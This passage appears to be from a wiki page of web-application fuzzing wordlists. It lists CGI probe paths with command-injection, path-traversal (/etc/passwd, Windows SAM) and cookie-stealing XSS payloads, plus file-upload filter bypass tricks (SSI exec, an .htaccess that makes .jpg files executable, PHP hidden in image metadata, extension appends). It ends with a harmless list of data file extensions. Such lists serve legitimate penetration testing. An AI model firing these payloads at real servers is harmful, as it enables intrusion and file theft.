# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
